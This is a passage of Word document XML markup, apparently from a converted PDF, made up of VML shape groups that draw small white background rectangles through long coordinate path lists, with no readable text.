2328,3146,2329,3146,2330,3146,2331,3146,2331,3146,2332,3146,2333,3146,2334,3146,2335,3146,2336,3146,2337,3146,2338,3146,2339,3146,2340,3146,2341,3146,2343,3146,2344,3146,2345,3146,2347,3146,2348,3146,2350,3146,2351,3146,2353,3146,2355,3146,2356,3146,2358,3146,2360,3146,2362,3146,2364,3146,2366,3146,2368,3146,2370,3146,2372,3146,2374,3146,2377,3146,2379,3146,2382,3146,2384,3146,2387,3146,2389,3146,2392,3146,2395,3146,2398,3146,2401,3146,2404,3146,2407,3146,2410,3146,2413,3146,2416,3146,2420,3146,2423,3146,2427,3146,2431,3146,2434,3146,2438,3146,2442,3146,2446,3146,2450,3146,2454,3146,2458,3146,2463,3146,2467,3146,2472,3146,2476,3146,2481,3146,2486,3146,2490,3146,2495,3146,2500,3146,2506,3146,2511,3146,2516,3146,2522,3146,2527,3146,2533,3146,2539,3146,2544,3146,2550,3146,2556,3146,2563,3146,2569,3146,2575,3146,2575,3146,2575,3146,2575,3146,2575,3146,2575,3146,2575,3146,2575,3146,2575,3146,2575,3146,2575,3146,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3145,2575,3144,2575,3144,2575,3144,2575,3144,2575,3144,2575,3144,2575,3143,2575,3143,2575,3143,2575,3143,2575,3143,2575,3142,2575,3142,2575,3142,2575,3141,2575,3141,2575,3141,2575,3140,2575,3140,2575,3140,2575,3139,2575,3139,2575,3138,2575,3138,2575,3137,2575,3137,2575,3136,2575,3136,2575,3135,2575,3134,2575,3134,2575,3133,2575,3132,2575,3132,2575,3131,2575,3130,2575,3129,2575,3129,2575,3128,2575,3127,2575,3126,2575,3125,2575,3124,2575,3123,2575,3122,2575,3121,2575,3120,2575,3119,2575,3118,2575,3117,2575,3116,2575,3114,2575,3113,2575,3112,2575,3110,2575,3109,2575,3108,2575,3106,2575,3105,2575,3103,2575,3102,2575,3100,2575,3099,2575,3097,2575,3095,2575,3094,2575,3092,2575,3090,2575,3088,2575,3086,2575,3084,2575,3083,2575,3081,2575,3079,2575,3076,2575,3074,2575,3072,2575,3070,2575,3068,2575,3065,2575,3063,2575,3061,2575,3058,2575,3056,2575,3053,2575,3051,2575,3048,2575,3045,2575,3043,2575,3040,2575,3037,2575,3034,2575,3031,2575,3029,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2575,3026,2574,3026,2574,3026,2574,3026,2574,3026,2574,3026,2573,3026,2573,3026,2573,3026,2573,3026,2572,3026,2572,3026,2572,3026,2571,3026,2571,3026,2570,3026,2570,3026,2569,3026,2569,3026,2568,3026,2568,3026,2567,3026,2566,3026,2566,3026,2565,3026,2564,3026,2563,3026,2562,3026,2562,3026,2561,3026,2560,3026,2559,3026,2557,3026,2556,3026,2555,3026,2554,3026,2553,3026,2551,3026,2550,3026,2549,3026,2547,3026,2546,3026,2544,3026,2543,3026,2541,3026,2539,3026,2537,3026,2536,3026,2534,3026,2532,3026,2530,3026,2528,3026,2526,3026,2523,3026,2521,3026,2519,3026,2516,3026,2514,3026,2511,3026,2509,3026,2506,3026,2503,3026,2501,3026,2498,3026,2495,3026,2492,3026,2489,3026,2486,3026,2482,3026,2479,3026,2476,3026,2472,3026,2469,3026,2465,3026,2461,3026,2457,3026,2454,3026,2450,3026,2445,3026,2441,3026,2437,3026,2433,3026,2428,3026,2424,3026,2419,3026,2415,3026,2410,3026,2405,3026,2400,3026,2395,3026,2390,3026,2385,3026,2379,3026,2374,3026,2368,3026,2363,3026,2357,3026,2351,3026,2345,3026,2339,3026,2333,3026,2327,3026,2320e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:175.500pt;margin-top:128.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3510,2570" coordsize="130,270">
        <v:shape style="position:absolute;left:3510;top:2570;width:130;height:270" coordorigin="3510,2570" coordsize="130,270" path="m3521,2590l3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3521,2590,3522,2590,3522,2590,3522,2590,3522,2590,3522,2590,3522,2590,3522,2590,3523,2590,3523,2590,3523,2590,3523,2590,3523,2590,3524,2590,3524,2590,3524,2590,3524,2590,3525,2590,3525,2590,3525,2590,3526,2590,3526,2590,3526,2590,3527,2590,3527,2590,3528,2590,3528,2590,3529,2590,3529,2590,3530,2590,3530,2590,3531,2590,3531,2590,3532,2590,3533,2590,3533,2590,3534,2590,3535,2590,3535,2590,3536,2590,3537,2590,3538,2590,3539,2590,3539,2590,3540,2590,3541,2590,3542,2590,3543,2590,3544,2590,3545,2590,3546,2590,3547,2590,3548,2590,3550,2590,3551,2590,3552,2590,3553,2590,3555,2590,3556,2590,3557,2590,3559,2590,3560,2590,3562,2590,3563,2590,3565,2590,3566,2590,3568,2590,3569,2590,3571,2590,3573,2590,3574,2590,3576,2590,3578,2590,3580,2590,3582,2590,3584,2590,3586,2590,3588,2590,3590,2590,3592,2590,3594,2590,3596,2590,3599,2590,3601,2590,3603,2590,3606,2590,3608,2590,3611,2590,3613,2590,3616,2590,3618,2590,3621,2590,3624,2590,3626,2590,3629,2590,3632,2590,3635,2590,3638,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2591,3641,2591,3641,2591,3641,2591,3641,2591,3641,2591,3641,2591,3641,2591,3641,2591,3641,2592,3641,2592,3641,2592,3641,2592,3641,2592,3641,2593,3641,2593,3641,2593,3641,2594,3641,2594,3641,2594,3641,2595,3641,2595,3641,2596,3641,2596,3641,2597,3641,2597,3641,2598,3641,2599,3641,2599,3641,2600,3641,2601,3641,2602,3641,2602,3641,2603,3641,2604,3641,2605,3641,2606,3641,2607,3641,2608,3641,2609,3641,2610,3641,2612,3641,2613,3641,2614,3641,2615,3641,2617,3641,2618,3641,2620,3641,2621,3641,2623,3641,2625,3641,2626,3641,2628,3641,2630,3641,2632,3641,2634,3641,2636,3641,2638,3641,2640,3641,2642,3641,2644,3641,2647,3641,2649,3641,2652,3641,2654,3641,2657,3641,2659,3641,2662,3641,2665,3641,2668,3641,2671,3641,2674,3641,2677,3641,2680,3641,2683,3641,2687,3641,2690,3641,2693,3641,2697,3641,2701,3641,2704,3641,2708,3641,2712,3641,2716,3641,2720,3641,2724,3641,2728,3641,2733,3641,2737,3641,2742,3641,2746,3641,2751,3641,2756,3641,2761,3641,2766,3641,2771,3641,2776,3641,2781,3641,2786,3641,2792,3641,2797,3641,2803,3641,2809,3641,2815,3641,2821,3641,2827,3641,2833,3641,2839,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3640,2845,3640,2845,3640,2845,3640,2845,3640,2845,3640,2845,3640,2845,3640,2845,3640,2845,3640,2845,3639,2845,3639,2845,3639,2845,3639,2845,3639,2845,3638,2845,3638,2845,3638,2845,3638,2845,3638,2845,3637,2845,3637,2845,3637,2845,3636,2845,3636,2845,3636,2845,3635,2845,3635,2845,3634,2845,3634,2845,3633,2845,3633,2845,3632,2845,3632,2845,3631,2845,3631,2845,3630,2845,3630,2845,3629,2845,3628,2845,3628,2845,3627,2845,3626,2845,3625,2845,3625,2845,3624,2845,3623,2845,3622,2845,3621,2845,3620,2845,3619,2845,3618,2845,3617,2845,3616,2845,3615,2845,3614,2845,3613,2845,3612,2845,3611,2845,3610,2845,3608,2845,3607,2845,3606,2845,3604,2845,3603,2845,3602,2845,3600,2845,3599,2845,3597,2845,3596,2845,3594,2845,3592,2845,3591,2845,3589,2845,3587,2845,3585,2845,3584,2845,3582,2845,3580,2845,3578,2845,3576,2845,3574,2845,3572,2845,3570,2845,3567,2845,3565,2845,3563,2845,3561,2845,3558,2845,3556,2845,3554,2845,3551,2845,3549,2845,3546,2845,3543,2845,3541,2845,3538,2845,3535,2845,3532,2845,3530,2845,3527,2845,3524,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2845,3521,2844,3521,2844,3521,2844,3521,2844,3521,2844,3521,2843,3521,2843,3521,2843,3521,2842,3521,2842,3521,2842,3521,2841,3521,2841,3521,2840,3521,2840,3521,2839,3521,2839,3521,2838,3521,2838,3521,2837,3521,2836,3521,2836,3521,2835,3521,2834,3521,2833,3521,2833,3521,2832,3521,2831,3521,2830,3521,2829,3521,2828,3521,2827,3521,2825,3521,2824,3521,2823,3521,2822,3521,2820,3521,2819,3521,2817,3521,2816,3521,2814,3521,2813,3521,2811,3521,2809,3521,2808,3521,2806,3521,2804,3521,2802,3521,2800,3521,2798,3521,2796,3521,2794,3521,2791,3521,2789,3521,2787,3521,2784,3521,2782,3521,2779,3521,2776,3521,2774,3521,2771,3521,2768,3521,2765,3521,2762,3521,2759,3521,2756,3521,2752,3521,2749,3521,2746,3521,2742,3521,2739,3521,2735,3521,2731,3521,2728,3521,2724,3521,2720,3521,2716,3521,2711,3521,2707,3521,2703,3521,2699,3521,2694,3521,2689,3521,2685,3521,2680,3521,2675,3521,2670,3521,2665,3521,2660,3521,2655,3521,2649,3521,2644,3521,2638,3521,2633,3521,2627,3521,2621,3521,2615,3521,2609,3521,2603,3521,2597,3521,2590e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:181.500pt;margin-top:128.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3630,2570" coordsize="130,270">
        <v:shape style="position:absolute;left:3630;top:2570;width:130;height:270" coordorigin="3630,2570" coordsize="130,270" path="m3641,2590l3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3641,2590,3642,2590,3642,2590,3642,2590,3642,2590,3642,2590,3642,2590,3642,2590,3643,2590,3643,2590,3643,2590,3643,2590,3643,2590,3644,2590,3644,2590,3644,2590,3644,2590,3645,2590,3645,2590,3645,2590,3646,2590,3646,2590,3646,2590,3647,2590,3647,2590,3648,2590,3648,2590,3649,2590,3649,2590,3650,2590,3650,2590,3651,2590,3651,2590,3652,2590,3653,2590,3653,2590,3654,2590,3655,2590,3655,2590,3656,2590,3657,2590,3658,2590,3659,2590,3660,2590,3660,2590,3661,2590,3662,2590,3663,2590,3664,2590,3665,2590,3666,2590,3667,2590,3669,2590,3670,2590,3671,2590,3672,2590,3673,2590,3675,2590,3676,2590,3677,2590,3679,2590,3680,2590,3682,2590,3683,2590,3685,2590,3686,2590,3688,2590,3689,2590,3691,2590,3693,2590,3695,2590,3696,2590,3698,2590,3700,2590,3702,2590,3704,2590,3706,2590,3708,2590,3710,2590,3712,2590,3714,2590,3716,2590,3719,2590,3721,2590,3723,2590,3726,2590,3728,2590,3731,2590,3733,2590,3736,2590,3738,2590,3741,2590,3744,2590,3746,2590,3749,2590,3752,2590,3755,2590,3758,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2590,3761,2591,3761,2591,3761,2591,3761,2591,3761,2591,3761,2591,3761,2591,3761,2591,3761,2591,3761,2592,3761,2592,3761,2592,3761,2592,3761,2592,3761,2593,3761,2593,3761,2593,3761,2594,3761,2594,3761,2594,3761,2595,3761,2595,3761,2596,3761,2596,3761,2597,3761,2597,3761,2598,3761,2599,3761,2599,3761,2600,3761,2601,3761,2602,3761,2602,3761,2603,3761,2604,3761,2605,3761,2606,3761,2607,3761,2608,3761,2609,3761,2610,3761,2612,3761,2613,3761,2614,3761,2615,3761,2617,3761,2618,3761,2620,3761,2621,3761,2623,3761,2625,3761,2626,3761,2628,3761,2630,3761,2632,3761,2634,3761,2636,3761,2638,3761,2640,3761,2642,3761,2644,3761,2647,3761,2649,3761,2652,3761,2654,3761,2657,3761,2659,3761,2662,3761,2665,3761,2668,3761,2671,3761,2674,3761,2677,3761,2680,3761,2683,3761,2687,3761,2690,3761,2693,3761,2697,3761,2701,3761,2704,3761,2708,3761,2712,3761,2716,3761,2720,3761,2724,3761,2728,3761,2733,3761,2737,3761,2742,3761,2746,3761,2751,3761,2756,3761,2761,3761,2766,3761,2771,3761,2776,3761,2781,3761,2786,3761,2792,3761,2797,3761,2803,3761,2809,3761,2815,3761,2821,3761,2827,3761,2833,3761,2839,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3761,2845,3760,2845,3760,2845,3760,2845,3760,2845,3760,2845,3760,2845,3760,2845,3760,2845,3760,2845,3759,2845,3759,2845,3759,2845,3759,2845,3759,2845,3759,2845,3758,2845,3758,2845,3758,2845,3758,2845,3757,2845,3757,2845,3757,2845,3756,2845,3756,2845,3756,2845,3755,2845,3755,2845,3754,2845,3754,2845,3753,2845,3753,2845,3753,2845,3752,2845,3751,2845,3751,2845,3750,2845,3750,2845,3749,2845,3748,2845,3748,2845,3747,2845,3746,2845,3746,2845,3745,2845,3744,2845,3743,2845,3742,2845,3741,2845,3740,2845,3739,2845,3738,2845,3737,2845,3736,2845,3735,2845,3734,2845,3733,2845,3732,2845,3731,2845,3730,2845,3728,2845,3727,2845,3726,2845,3724,2845,3723,2845,3722,2845,3720,2845,3719,2845,3717,2845,3716,2845,3714,2845,3712,2845,3711,2845,3709,2845,3707,2845,3705,2845,3704,2845,3702,2845,3700,2845,3698,2845,3696,2845,3694,2845,3692,2845,3690,2845,3687,2845,3685,2845,3683,2845,3681,2845,3678,2845,3676,2845,3674,2845,3671,2845,3669,2845,3666,2845,3663,2845,3661,2845,3658,2845,3655,2845,3653,2845,3650,2845,3647,2845,3644,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2845,3641,2844,3641,2844,3641,2844,3641,2844,3641,2844,3641,2843,3641,2843,3641,2843,3641,2842,3641,2842,3641,2842,3641,2841,3641,2841,3641,2840,3641,2840,3641,2839,3641,2839,3641,2838,3641,2838,3641,2837,3641,2836,3641,2836,3641,2835,3641,2834,3641,2833,3641,2833,3641,2832,3641,2831,3641,2830,3641,2829,3641,2828,3641,2827,3641,2825,3641,2824,3641,2823,3641,2822,3641,2820,3641,2819,3641,2817,3641,2816,3641,2814,3641,2813,3641,2811,3641,2809,3641,2808,3641,2806,3641,2804,3641,2802,3641,2800,3641,2798,3641,2796,3641,2794,3641,2791,3641,2789,3641,2787,3641,2784,3641,2782,3641,2779,3641,2776,3641,2774,3641,2771,3641,2768,3641,2765,3641,2762,3641,2759,3641,2756,3641,2752,3641,2749,3641,2746,3641,2742,3641,2739,3641,2735,3641,2731,3641,2728,3641,2724,3641,2720,3641,2716,3641,2711,3641,2707,3641,2703,3641,2699,3641,2694,3641,2689,3641,2685,3641,2680,3641,2675,3641,2670,3641,2665,3641,2660,3641,2655,3641,2649,3641,2644,3641,2638,3641,2633,3641,2627,3641,2621,3641,2615,3641,2609,3641,2603,3641,2597,3641,2590e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:499.500pt;margin-top:128.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9990,2570" coordsize="250,270">
        <v:shape style="position:absolute;left:9990;top:2570;width:250;height:270" coordorigin="9990,2570" coordsize="250,270" path="m10004,2590l10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10004,2590,10005,2590,10005,2590,10005,2590,10005,2590,10005,2590,10005,2590,10005,2590,10006,2590,10006,2590,10006,2590,10006,2590,10007,2590,10007,2590,10007,2590,10008,2590,10008,2590,10008,2590,10009,2590,10009,2590,10010,2590,10010,2590,10011,2590,10011,2590,10012,2590,10012,2590,10013,2590,10014,2590,10015,2590,10015,2590,10016,2590,10017,2590,10018,2590,10019,2590,10020,2590,10021,2590,10022,2590,10023,2590,10024,2590,10025,2590,10026,2590,10028,2590,10029,2590,10030,2590,10032,2590,10033,2590,10035,2590,10036,2590,10038,2590,10040,2590,10041,2590,10043,2590,10045,2590,10047,2590,10049,2590,10051,2590,10053,2590,10055,2590,10057,2590,10059,2590,10062,2590,10064,2590,10067,2590,10069,2590,10072,2590,10074,2590,10077,2590,10080,2590,10083,2590,10086,2590,10088,2590,10092,2590,10095,2590,10098,2590,10101,2590,10104,2590,10108,2590,10111,2590,10115,2590,10119,2590,10122,2590,10126,2590,10130,2590,10134,2590,10138,2590,10142,2590,10147,2590,10151,2590,10155,2590,10160,2590,10164,2590,10169,2590,10174,2590,10179,2590,10184,2590,10189,2590,10194,2590,10199,2590,10204,2590,10210,2590,10215,2590,10221,2590,10226,2590,10232,2590,10238,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2590,10244,2591,10244,2591,10244,2591,10244,2591,10244,2591,10244,2591,10244,2591,10244,2591,10244,2591,10244,2592,10244,2592,10244,2592,10244,2592,10244,2592,10244,2593,10244,2593,10244,2593,10244,2594,10244,2594,10244,2594,10244,2595,10244,2595,10244,2596,10244,2596,10244,2597,10244,2597,10244,2598,10244,2599,10244,2599,10244,2600,10244,2601,10244,2602,10244,2602,10244,2603,10244,2604,10244,2605,10244,2606,10244,2607,10244,2608,10244,2609,10244,2610,10244,2612,10244,2613,10244,2614,10244,2615,10244,2617,10244,2618,10244,2620,10244,2621,10244,2623,10244,2625,10244,2626,10244,2628,10244,2630,10244,2632,10244,2634,10244,2636,10244,2638,10244,2640,10244,2642,10244,2644,10244,2647,10244,2649,10244,2652,10244,2654,10244,2657,10244,2659,10244,2662,10244,2665,10244,2668,10244,2671,10244,2674,10244,2677,10244,2680,10244,2683,10244,2687,10244,2690,10244,2693,10244,2697,10244,2701,10244,2704,10244,2708,10244,2712,10244,2716,10244,2720,10244,2724,10244,2728,10244,2733,10244,2737,10244,2742,10244,2746,10244,2751,10244,2756,10244,2761,10244,2766,10244,2771,10244,2776,10244,2781,10244,2786,10244,2792,10244,2797,10244,2803,10244,2809,10244,2815,10244,2821,10244,2827,10244,2833,10244,2839,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10244,2845,10243,2845,10243,2845,10243,2845,10243,2845,10243,2845,10243,2845,10242,2845,10242,2845,10242,2845,10242,2845,10241,2845,10241,2845,10241,2845,10240,2845,10240,2845,10239,2845,10239,2845,10239,2845,10238,2845,10238,2845,10237,2845,10236,2845,10236,2845,10235,2845,10234,2845,10234,2845,10233,2845,10232,2845,10231,2845,10230,2845,10229,2845,10228,2845,10227,2845,10226,2845,10225,2845,10224,2845,10223,2845,10222,2845,10220,2845,10219,2845,10218,2845,10216,2845,10215,2845,10213,2845,10212,2845,10210,2845,10209,2845,10207,2845,10205,2845,10203,2845,10201,2845,10199,2845,10197,2845,10195,2845,10193,2845,10191,2845,10189,2845,10186,2845,10184,2845,10182,2845,10179,2845,10177,2845,10174,2845,10171,2845,10168,2845,10166,2845,10163,2845,10160,2845,10157,2845,10154,2845,10150,2845,10147,2845,10144,2845,10140,2845,10137,2845,10133,2845,10130,2845,10126,2845,10122,2845,10118,2845,10114,2845,10110,2845,10106,2845,10102,2845,10097,2845,10093,2845,10088,2845,10084,2845,10079,2845,10074,2845,10070,2845,10065,2845,10060,2845,10055,2845,10049,2845,10044,2845,10039,2845,10033,2845,10027,2845,10022,2845,10016,2845,10010,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2845,10004,2844,10004,2844,10004,2844,10004,2844,10004,2844,10004,2843,10004,2843,10004,2843,10004,2842,10004,2842,10004,2842,10004,2841,10004,2841,10004,2840,10004,2840,10004,2839,10004,2839,10004,2838,10004,2838,10004,2837,10004,2836,10004,2836,10004,2835,10004,2834,10004,2833,10004,2833,10004,2832,10004,2831,10004,2830,10004,2829,10004,2828,10004,2827,10004,2825,10004,2824,10004,2823,10004,2822,10004,2820,10004,2819,10004,2817,10004,2816,10004,2814,10004,2813,10004,2811,10004,2809,10004,2808,10004,2806,10004,2804,10004,2802,10004,2800,10004,2798,10004,2796,10004,2794,10004,2791,10004,2789,10004,2787,10004,2784,10004,2782,10004,2779,10004,2776,10004,2774,10004,2771,10004,2768,10004,2765,10004,2762,10004,2759,10004,2756,10004,2752,10004,2749,10004,2746,10004,2742,10004,2739,10004,2735,10004,2731,10004,2728,10004,2724,10004,2720,10004,2716,10004,2711,10004,2707,10004,2703,10004,2699,10004,2694,10004,2689,10004,2685,10004,2680,10004,2675,10004,2670,10004,2665,10004,2660,10004,2655,10004,2649,10004,2644,10004,2638,10004,2633,10004,2627,10004,2621,10004,2615,10004,2609,10004,2603,10004,2597,10004,2590e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:517.500pt;margin-top:128.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10350,2570" coordsize="130,270">
        <v:shape style="position:absolute;left:10350;top:2570;width:130;height:270" coordorigin="10350,2570" coordsize="130,270" path="m10364,2590l10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10364,2590,10365,2590,10365,2590,10365,2590,10365,2590,10365,2590,10365,2590,10365,2590,10365,2590,10365,2590,10365,2590,10365,2590,10366,2590,10366,2590,10366,2590,10366,2590,10366,2590,10367,2590,10367,2590,10367,2590,10367,2590,10368,2590,10368,2590,10368,2590,10368,2590,10369,2590,10369,2590,10370,2590,10370,2590,10370,2590,10371,2590,10371,2590,10372,2590,10372,2590,10373,2590,10373,2590,10374,2590,10374,2590,10375,2590,10375,2590,10376,2590,10377,2590,10377,2590,10378,2590,10379,2590,10380,2590,10380,2590,10381,2590,10382,2590,10383,2590,10384,2590,10385,2590,10386,2590,10387,2590,10388,2590,10389,2590,10390,2590,10391,2590,10392,2590,10393,2590,10394,2590,10395,2590,10397,2590,10398,2590,10399,2590,10401,2590,10402,2590,10404,2590,10405,2590,10406,2590,10408,2590,10410,2590,10411,2590,10413,2590,10414,2590,10416,2590,10418,2590,10420,2590,10422,2590,10423,2590,10425,2590,10427,2590,10429,2590,10431,2590,10433,2590,10435,2590,10438,2590,10440,2590,10442,2590,10444,2590,10447,2590,10449,2590,10452,2590,10454,2590,10456,2590,10459,2590,10462,2590,10464,2590,10467,2590,10470,2590,10473,2590,10475,2590,10478,2590,10481,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2591,10484,2591,10484,2591,10484,2591,10484,2591,10484,2591,10484,2591,10484,2591,10484,2591,10484,2592,10484,2592,10484,2592,10484,2592,10484,2592,10484,2593,10484,2593,10484,2593,10484,2594,10484,2594,10484,2594,10484,2595,10484,2595,10484,2596,10484,2596,10484,2597,10484,2597,10484,2598,10484,2599,10484,2599,10484,2600,10484,2601,10484,2602,10484,2602,10484,2603,10484,2604,10484,2605,10484,2606,10484,2607,10484,2608,10484,2609,10484,2610,10484,2612,10484,2613,10484,2614,10484,2615,10484,2617,10484,2618,10484,2620,10484,2621,10484,2623,10484,2625,10484,2626,10484,2628,10484,2630,10484,2632,10484,2634,10484,2636,10484,2638,10484,2640,10484,2642,10484,2644,10484,2647,10484,2649,10484,2652,10484,2654,10484,2657,10484,2659,10484,2662,10484,2665,10484,2668,10484,2671,10484,2674,10484,2677,10484,2680,10484,2683,10484,2687,10484,2690,10484,2693,10484,2697,10484,2701,10484,2704,10484,2708,10484,2712,10484,2716,10484,2720,10484,2724,10484,2728,10484,2733,10484,2737,10484,2742,10484,2746,10484,2751,10484,2756,10484,2761,10484,2766,10484,2771,10484,2776,10484,2781,10484,2786,10484,2792,10484,2797,10484,2803,10484,2809,10484,2815,10484,2821,10484,2827,10484,2833,10484,2839,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10483,2845,10483,2845,10483,2845,10483,2845,10483,2845,10483,2845,10483,2845,10482,2845,10482,2845,10482,2845,10482,2845,10481,2845,10481,2845,10481,2845,10481,2845,10480,2845,10480,2845,10480,2845,10479,2845,10479,2845,10479,2845,10478,2845,10478,2845,10477,2845,10477,2845,10476,2845,10476,2845,10475,2845,10475,2845,10474,2845,10474,2845,10473,2845,10472,2845,10472,2845,10471,2845,10470,2845,10470,2845,10469,2845,10468,2845,10467,2845,10466,2845,10466,2845,10465,2845,10464,2845,10463,2845,10462,2845,10461,2845,10460,2845,10459,2845,10458,2845,10457,2845,10455,2845,10454,2845,10453,2845,10452,2845,10450,2845,10449,2845,10448,2845,10446,2845,10445,2845,10444,2845,10442,2845,10441,2845,10439,2845,10437,2845,10436,2845,10434,2845,10432,2845,10431,2845,10429,2845,10427,2845,10425,2845,10423,2845,10421,2845,10419,2845,10417,2845,10415,2845,10413,2845,10411,2845,10409,2845,10406,2845,10404,2845,10402,2845,10399,2845,10397,2845,10395,2845,10392,2845,10389,2845,10387,2845,10384,2845,10381,2845,10379,2845,10376,2845,10373,2845,10370,2845,10367,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2845,10364,2844,10364,2844,10364,2844,10364,2844,10364,2844,10364,2843,10364,2843,10364,2843,10364,2842,10364,2842,10364,2842,10364,2841,10364,2841,10364,2840,10364,2840,10364,2839,10364,2839,10364,2838,10364,2838,10364,2837,10364,2836,10364,2836,10364,2835,10364,2834,10364,2833,10364,2833,10364,2832,10364,2831,10364,2830,10364,2829,10364,2828,10364,2827,10364,2825,10364,2824,10364,2823,10364,2822,10364,2820,10364,2819,10364,2817,10364,2816,10364,2814,10364,2813,10364,2811,10364,2809,10364,2808,10364,2806,10364,2804,10364,2802,10364,2800,10364,2798,10364,2796,10364,2794,10364,2791,10364,2789,10364,2787,10364,2784,10364,2782,10364,2779,10364,2776,10364,2774,10364,2771,10364,2768,10364,2765,10364,2762,10364,2759,10364,2756,10364,2752,10364,2749,10364,2746,10364,2742,10364,2739,10364,2735,10364,2731,10364,2728,10364,2724,10364,2720,10364,2716,10364,2711,10364,2707,10364,2703,10364,2699,10364,2694,10364,2689,10364,2685,10364,2680,10364,2675,10364,2670,10364,2665,10364,2660,10364,2655,10364,2649,10364,2644,10364,2638,10364,2633,10364,2627,10364,2621,10364,2615,10364,2609,10364,2603,10364,2597,10364,2590e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:85.500pt;margin-top:142.500pt;width:12.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1710,2850" coordsize="250,250">
